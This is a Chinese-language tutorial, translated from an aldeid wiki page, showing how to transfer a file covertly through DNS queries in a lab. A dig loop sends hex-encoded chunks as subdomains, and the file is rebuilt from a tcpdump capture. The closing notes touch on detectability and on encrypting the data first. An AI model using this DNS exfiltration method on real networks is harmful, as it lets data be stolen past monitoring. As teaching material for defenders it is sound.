原文 http://www.aldeid.com/wiki/File-transfer-via-DNS
测试环境:
- Client: 192.168.106.134
- Server: 192.168.106.131, running bind9 DNS server
Demo:
编码:
在客户端,准备纯文本文件:
client$ cat > loremipsum.txt << EOF
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod
tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,
quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo
consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse
cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat
non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
EOF
然后hex编码:
client$ xxd -p loremipsum.txt > loremipsum.hex
传输文件:
在服务器端,开启一个tcpdump抓包:
server$ sudo tcpdump -i eth1 -s0 -w loremipsum.pcap 'port 53 and host 192.168.106.134'
在客户端,把每一行当作一个假的DNS请求发送:
client$ for b in `cat loremipsum.hex`; do dig @192.168.106.131 $b.fakednsrequest.com; done
一旦所有的请求发送完毕,停止抓包。请求内容类似:
server$ tcpdump -n -r loremipsum.pcap 'host 192.168.106.131 and host 192.168.106.134' | grep fakednsrequest
reading from file loremipsum.pcap, link-type EN10MB (Ethernet)
16:27:53.643447 IP 192.168.106.134.49731 > 192.168.106.131.53: 8314+ A? 4c6f72656d20697073756d20646f6c6f722073697420616d65742c20636f.fakednsrequest.com. (97)
16:27:58.644248 IP 192.168.106.134.49731 > 192.168.106.131.53: 8314+ A? 4c6f72656d20697073756d20646f6c6f722073697420616d65742c20636f.fakednsrequest.com. (97)
16:28:03.645370 IP 192.168.106.134.49731 > 192.168.106.131.53: 8314+ A? 4c6f72656d20697073756d20646f6c6f722073697420616d65742c20636f.fakednsrequest.com. (97)
16:28:08.660632 IP 192.168.106.134.55094 > 192.168.106.131.53: 46493+ A? 6e7365637465747572206164697069736963696e6720656c69742c207365.fakednsrequest.com. (97)
16:28:13.663396 IP 192.168.106.134.55094 > 192.168.106.131.53: 46493+ A? 6e7365637465747572206164697069736963696e6720656c69742c207365.fakednsrequest.com. (97)
16:28:18.664434 IP 192.168.106.134.55094 > 192.168.106.131.53: 46493+ A? 6e7365637465747572206164697069736963696e6720656c69742c207365.fakednsrequest.com. (97)
16:28:23.677182 IP 192.168.106.134.60005 > 192.168.106.131.53: 52118+ A? 6420646f20656975736d6f642074656d706f7220696e6369646964756e74.fakednsrequest.com. (97)
16:28:28.677606 IP 192.168.106.134.60005 > 192.168.106.131.53: 52118+ A? 6420646f20656975736d6f642074656d706f7220696e6369646964756e74.fakednsrequest.com. (97)
16:28:33.678711 IP 192.168.106.134.60005 > 192.168.106.131.53: 52118+ A? 6420646f20656975736d6f642074656d706f7220696e6369646964756e74.fakednsrequest.com. (97)
16:28:38.689582 IP 192.168.106.134.56318 > 192.168.106.131.53: 57751+ A? 207574206c61626f726520657420646f6c6f7265206d61676e6120616c69.fakednsrequest.com. (97)
16:28:43.689821 IP 192.168.106.134.56318 > 192.168.106.131.53: 57751+ A? 207574206c61626f726520657420646f6c6f7265206d61676e6120616c69.fakednsrequest.com. (97)
16:28:48.691096 IP 192.168.106.134.56318 > 192.168.106.131.53: 57751+ A? 207574206c61626f726520657420646f6c6f7265206d61676e6120616c69.fakednsrequest.com. (97)
16:28:53.702963 IP 192.168.106.134.48932 > 192.168.106.131.53: 23279+ A? 7175612e20557420656e696d206164206d696e696d2076656e69616d2c20.fakednsrequest.com. (97)
16:28:58.703995 IP 192.168.106.134.48932 > 192.168.106.131.53: 23279+ A? 7175612e20557420656e696d206164206d696e696d2076656e69616d2c20.fakednsrequest.com. (97)
16:29:03.705035 IP 192.168.106.134.48932 > 192.168.106.131.53: 23279+ A? 7175612e20557420656e696d206164206d696e696d2076656e69616d2c20.fakednsrequest.com. (97)
16:29:08.723883 IP 192.168.106.134.48334 > 192.168.106.131.53: 6065+ A? 71756973206e6f737472756420657865726369746174696f6e20756c6c61.fakednsrequest.com. (97)
16:29:13.724759 IP 192.168.106.134.48334 > 192.168.106.131.53: 6065+ A? 71756973206e6f737472756420657865726369746174696f6e20756c6c61.fakednsrequest.com. (97)
16:29:18.725429 IP 192.168.106.134.48334 > 192.168.106.131.53: 6065+ A? 71756973206e6f737472756420657865726369746174696f6e20756c6c61.fakednsrequest.com. (97)
16:29:23.736561 IP 192.168.106.134.48875 > 192.168.106.131.53: 35508+ A? 6d636f206c61626f726973206e69736920757420616c6971756970206578.fakednsrequest.com. (97)
16:29:28.737793 IP 192.168.106.134.48875 > 192.168.106.131.53: 35508+ A? 6d636f206c61626f726973206e69736920757420616c6971756970206578.fakednsrequest.com. (97)
16:29:33.738747 IP 192.168.106.134.48875 > 192.168.106.131.53: 35508+ A? 6d636f206c61626f726973206e69736920757420616c6971756970206578.fakednsrequest.com. (97)
16:29:38.793934 IP 192.168.106.134.54201 > 192.168.106.131.53: 47339+ A? 20656120636f6d6d6f646f20636f6e7365717561742e2044756973206175.fakednsrequest.com. (97)
16:29:43.794793 IP 192.168.106.134.54201 > 192.168.106.131.53: 47339+ A? 20656120636f6d6d6f646f20636f6e7365717561742e2044756973206175.fakednsrequest.com. (97)
16:29:48.795804 IP 192.168.106.134.54201 > 192.168.106.131.53: 47339+ A? 20656120636f6d6d6f646f20636f6e7365717561742e2044756973206175.fakednsrequest.com. (97)
16:29:53.839608 IP 192.168.106.134.40822 > 192.168.106.131.53: 27672+ A? 746520697275726520646f6c6f7220696e20726570726568656e64657269.fakednsrequest.com. (97)
16:29:58.820917 IP 192.168.106.134.40822 > 192.168.106.131.53: 27672+ A? 746520697275726520646f6c6f7220696e20726570726568656e64657269.fakednsrequest.com. (97)
16:30:03.821932 IP 192.168.106.134.40822 > 192.168.106.131.53: 27672+ A? 746520697275726520646f6c6f7220696e20726570726568656e64657269.fakednsrequest.com. (97)
16:30:08.865585 IP 192.168.106.134.36479 > 192.168.106.131.53: 61438+ A? 7420696e20766f6c7570746174652076656c697420657373652063696c6c.fakednsrequest.com. (97)
16:30:13.867062 IP 192.168.106.134.36479 > 192.168.106.131.53: 61438+ A? 7420696e20766f6c7570746174652076656c697420657373652063696c6c.fakednsrequest.com. (97)
16:30:18.868091 IP 192.168.106.134.36479 > 192.168.106.131.53: 61438+ A? 7420696e20766f6c7570746174652076656c697420657373652063696c6c.fakednsrequest.com. (97)
16:30:23.914226 IP 192.168.106.134.56473 > 192.168.106.131.53: 39998+ A? 756d20646f6c6f726520657520667567696174206e756c6c612070617269.fakednsrequest.com. (97)
16:30:28.914082 IP 192.168.106.134.56473 > 192.168.106.131.53: 39998+ A? 756d20646f6c6f726520657520667567696174206e756c6c612070617269.fakednsrequest.com. (97)
16:30:33.916140 IP 192.168.106.134.56473 > 192.168.106.131.53: 39998+ A? 756d20646f6c6f726520657520667567696174206e756c6c612070617269.fakednsrequest.com. (97)
16:30:38.967663 IP 192.168.106.134.33293 > 192.168.106.131.53: 22194+ A? 617475722e204578636570746575722073696e74206f6363616563617420.fakednsrequest.com. (97)
16:30:43.969259 IP 192.168.106.134.33293 > 192.168.106.131.53: 22194+ A? 617475722e204578636570746575722073696e74206f6363616563617420.fakednsrequest.com. (97)
16:30:48.960339 IP 192.168.106.134.33293 > 192.168.106.131.53: 22194+ A? 617475722e204578636570746575722073696e74206f6363616563617420.fakednsrequest.com. (97)
16:30:54.018795 IP 192.168.106.134.40212 > 192.168.106.131.53: 24058+ A? 637570696461746174206e6f6e2070726f6964656e742c2073756e742069.fakednsrequest.com. (97)
16:30:59.019316 IP 192.168.106.134.40212 > 192.168.106.131.53: 24058+ A? 637570696461746174206e6f6e2070726f6964656e742c2073756e742069.fakednsrequest.com. (97)
16:31:04.010034 IP 192.168.106.134.40212 > 192.168.106.131.53: 24058+ A? 637570696461746174206e6f6e2070726f6964656e742c2073756e742069.fakednsrequest.com. (97)
16:31:09.067424 IP 192.168.106.134.46047 > 192.168.106.131.53: 10148+ A? 6e2063756c706120717569206f666669636961206465736572756e74206d.fakednsrequest.com. (97)
16:31:14.068462 IP 192.168.106.134.46047 > 192.168.106.131.53: 10148+ A? 6e2063756c706120717569206f666669636961206465736572756e74206d.fakednsrequest.com. (97)
16:31:19.069481 IP 192.168.106.134.46047 > 192.168.106.131.53: 10148+ A? 6e2063756c706120717569206f666669636961206465736572756e74206d.fakednsrequest.com. (97)
16:31:24.140100 IP 192.168.106.134.53254 > 192.168.106.131.53: 9356+ A? 6f6c6c697420616e696d20696420657374206c61626f72756d2e0a.fakednsrequest.com. (91)
16:31:29.141466 IP 192.168.106.134.53254 > 192.168.106.131.53: 9356+ A? 6f6c6c697420616e696d20696420657374206c61626f72756d2e0a.fakednsrequest.com. (91)
16:31:34.142622 IP 192.168.106.134.53254 > 192.168.106.131.53: 9356+ A? 6f6c6c697420616e696d20696420657374206c61626f72756d2e0a.fakednsrequest.com. (91)
解码文件:
使用一连串的cut命令提取十六进制文件:
server$ tcpdump -n -r loremipsum.pcap 'host 192.168.106.131 and host 192.168.106.134' | grep fakednsrequest | cut -d ' ' -f 8 | cut -d '.' -f 1 | uniq > loremipsum.hex
现在解码文件:
$ xxd -r -p < loremipsum.hex
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod
tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,
quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo
consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse
cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat
non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
限制:
- 传输文件是源文件2倍大小
- 由于频繁的请求可以引起怀疑,所以它可以变得相对可见
- 由于源文件的大小,花费时间可能较长
- 除非在十六进制编码之前加密,否则可以很方便解码
- 大文件可能丢包(UDP)